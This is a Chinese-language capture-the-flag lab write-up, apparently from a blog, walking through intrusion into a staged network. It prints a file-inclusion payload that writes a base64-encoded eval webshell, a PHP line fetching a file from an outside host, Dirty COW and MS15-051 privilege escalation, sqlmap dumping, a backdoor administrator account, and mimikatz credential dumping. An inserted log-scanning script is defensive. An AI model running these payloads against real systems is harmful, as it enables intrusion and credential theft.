I. External perimeter penetration
Challenge entry point: www.theyer.com
Subdomain enumeration turned up shop.theyer.com; continued reconnaissance there.
Directory scan
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200806212452441-1717234176.png)
Port scan
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807000439882-356950181.png)
1. File inclusion
http://shop.theyer.com/index.php?page=about.php looks like a file inclusion; tried the php://input stream wrapper to execute PHP code.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002359785-205599709.png)
Write a shell: the earlier directory scan found an upload directory, so the shell was written there.
http://shop.theyer.com/index.php?page=php://input
<?php echo `echo PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pPz4=|base64 -d > upload/1.php` ;?>
or
<?php copy("http://172.16.8.2/1.txt","upload/b.php");?>
Connected with China Chopper (菜刀); the first flag is in the www directory.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002701221-1531145838.png)
flag{171b4706-0064-4f38-b617-c95c191958a9}
In the API of the www.theyer.com site, a commented-out database connection string was found.
2. Privilege escalation
Switching to the root directory failed for lack of permissions; checked the kernel version.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002746599-452634340.png)
Tried the Dirty COW privilege escalation:
gcc -pthread dirty.c -o dirty -lcrypt
./dirty lazy123
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002900981-1406612302.png)
Logged in directly over SSH and read the flag.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002826333-640363432.png)
3. Download the APK and statically analyze the source to find the API endpoint
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002928585-377357247.png)
Rename the extension to .zip to extract the dex file, then decompile it to recover the source.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807002941999-320554509.png)
d2j-dex2jar.bat classes.dex
Reading the source reveals the API URL.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003045993-425059505.png)
II. Internal network penetration
Checking the host's network configuration shows two network interfaces.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003113141-1847958637.png)
Uploaded reGeorg, configured the proxy and scanned through it to discover hosts and ports; the following hosts were found.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003125880-755736050.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003138333-268896741.png)
3. API endpoint leaked in JavaScript, SQL injection
192.168.6.17 has port 80 open, so the usual web penetration on port 80.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003151100-38737322.png)
Directory scan
python3 dirsearch.py -u http://192.168.6.17/ -e * --delay 0.1
Viewing the page source reveals a suspicious JavaScript function.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003258369-360904388.png)
The leaked endpoint is in js/main.js.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003307359-1684496683.png)
Request http://192.168.6.17/message.php?id=1
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003322699-1966785259.png)
This "system maintenance" message is the same one shown on the home page. Tested for SQL injection: the parameter is numeric.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003400710-1866947539.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003406765-655628791.png)
And it is a blind injection with no visible output.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003415222-1904690162.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003424605-266380100.png)
Tried sqlmap, using --technique to specify the injection type and --time-sec to set the delay:
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T --dbs
Two databases were enumerated:
[*] information_schema
[*] my_oa
Enumerate the table names:
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T -D my_oa --tables
Dump the flag table directly:
python3 sqlmap.py -u http://192.168.6.17/message.php?id=1 --technique T -D my_oa -T flag --dump
This gives the flag:
flag{9597b462fe22}
Continued with the admin table to obtain the password hash.
MD5 hash cracked: 29acd667cdbee1116d365727ca6821d3
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003652039-33996355.png)
The credentials are admin/37s984pass. The earlier directory scan found an admin directory; after logging into the back end, the profile page allows image uploads with no filtering at all, giving a shell directly.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003705030-1873264020.png)
http://192.168.6.17/upload/images/20200806121306.php
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003719256-461256841.png)
Webshell obtained.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003759424-375735662.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003804912-2105762256.png)
flag{3d9a2e33-0f0a-41de-ae9f-fa138abc0f70}
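From the defender's side, the three web-layer techniques used in sections 1 and 3 above all leave traces in the web server's access log. The script below is an added example (not part of the original writeup) that scans Apache combined-format log lines for a php:// stream wrapper in the page include parameter, a time-based SQL injection payload in message.php?id=, and a .php file requested from an upload directory. The log lines, client IPs and rule names are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Detection rules for the three web-layer techniques in this writeup: a stream
# wrapper in the include parameter, a time-based SQLi payload, and a .php file
# requested from an upload directory.
RULES = [
    ("php_wrapper_include", re.compile(r"[?&]page=(?:php|data|expect)://", re.I)),
    ("time_based_sqli", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("php_in_upload_dir", re.compile(r"/upload/[^?\s]*\.php\b", re.I)),
]
# Apache combined log format: client, identd, user, timestamp, request, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Constructed sample lines (not from the lab); 10.0.0.9 plays the attacker.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Aug/2020:12:13:01 +0800] "GET /index.php?page=about.php HTTP/1.1" 200 512
10.0.0.9 - - [06/Aug/2020:12:13:06 +0800] "POST /index.php?page=php://input HTTP/1.1" 200 33
10.0.0.9 - - [06/Aug/2020:12:14:12 +0800] "GET /message.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 0
10.0.0.9 - - [06/Aug/2020:12:15:40 +0800] "GET /upload/images/20200806121306.php HTTP/1.1" 200 18
10.0.0.7 - - [06/Aug/2020:12:16:02 +0800] "GET /js/main.js HTTP/1.1" 200 2048
"""

def parse_line(line):
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode %xx escapes first so encoded payloads cannot slip past the rules.
    rec["path"] = unquote_plus(rec["path"])
    return rec

def scan(lines):
    """Return one hit per (line, rule) match, keeping the decoded path."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["path"]):
                hits.append({"ip": rec["ip"], "rule": name,
                             "path": rec["path"], "status": rec["status"]})
    return hits

def by_source(hits):
    """Count hits per client IP; a source tripping several rules is the lead."""
    return dict(Counter(h["ip"] for h in hits))
```

Run it with scan(SAMPLE_LOG.splitlines()) and by_source() on the result; the one client that trips all three rules in sequence is the pivot host to start an investigation from.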
4. Mail server credentials leaked in a remote connection configuration
The configuration file in the source code contains the credentials for the remote mail server.
SMTP server at 192.168.6.16, username and password zhangming@test.com/fgpass2814
Local database username and password myoa/myoa123123
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003831708-1883342430.png)
Used the mailbox username and password to log in to the web interface on 192.168.6.16.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003840799-637359209.png)
Logged in.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003849638-1219898245.png)
After capturing and testing the traffic, the id=1 field in the cookie looked suspicious, so tried injecting there.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003856954-1206802443.png)
Marked the id=1 position with * as the injection point, but it did not succeed.
5. Tomcat weak credentials, WAR deployment
192.168.6.16:8080
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003917636-1172241940.png)
Logged in to the manager with tomcat/tomcat.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003927353-666264781.png)
Deployed WAR URL: http://192.168.6.16:8080/test/index.jsp
The first flag is in /var/www.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003945943-1510462232.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807003954528-748612412.png)
flag{3c6ea172-7c27-438f-b440-e71f99a59b37}
The second flag is in the root directory.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004019298-1037809357.png)
flag{02541512-d87c-4d13-bae8-4a9ad0ce2780}
Reviewing /var/log/apache2/access_log shows access records from the host 192.168.6.200.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004034140-1188691935.png)
The service on port 80 lives in /var/www/html/; the database configuration file is in the inc directory.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004040339-1987796081.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004054199-518668861.png)
Port 3306 is not exposed externally. Behinder's (冰蝎) built-in database connection feature could not connect, so tried AntSword's (蚁剑) instead. Note that the uploaded webshell has no execute permission by default and needs chmod to add it.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004111264-921463135.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004119378-2062729175.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004124615-716675413.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004132352-1919567709.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004138764-103086625.png)
The connection succeeded and yielded admin's password hash 22f2e5ec0bf4b85554c755993e2ba67f, which cracks to admin/2_333admin.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004203779-104496201.png)
6. Credential stuffing on 3389 and privilege escalation
Combined all previously collected passwords into a dictionary.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004221833-393110087.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004227198-69712226.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004233535-1049887989.png)
Brute-forced the ports that allow logins; Remote Desktop login to 192.168.6.200 succeeded.
192.168.6.200----RDP----3389----admin----2_333admin
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004245202-101148112.png)
Connected over Remote Desktop; the flag was found in Notepad's recent files.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004256979-1522696995.png)
Reading it directly fails for lack of permissions, so privilege escalation is needed.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004306215-1933257560.png)
systeminfo shows the host details; from the installed patches, MS15-051 can be used for privilege escalation.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004317784-26314819.png)
Searching for the flag from cmd:
dir c:\ /s /b |find "flag"
Adding a Windows user:
net user test test /add
Granting it administrator rights:
net localgroup administrators test /add
Logged in over Remote Desktop as the test user and read the flag.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004502034-352343274.png)
flag{13b69f33-f205-436b-8c41-ccda0dff66e0}
7. Reading passwords with mimikatz and logging in to the domain controller
privilege::debug
sekurlsa::logonPasswords
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004542429-1855470241.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004551784-96583472.png)
The host is domain-joined; reconnaissance finds the domain name myad.com.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004618481-181875025.png)
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004625616-850698987.png)
Pinging myad.com resolves the domain controller to 10.1.1.10.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004639634-1260597201.png)
Tried the dumped credentials administrator/ppx()0778 against the domain controller; login succeeded.
Accessing \\10.1.1.10\c$, the flag is in the root of the drive.
![](https://img2020.cnblogs.com/blog/1466240/202008/1466240-20200807004650669-1699483554.png)
flag{a7b92c63-9381-4ece-8f1e-a9f6107c2170}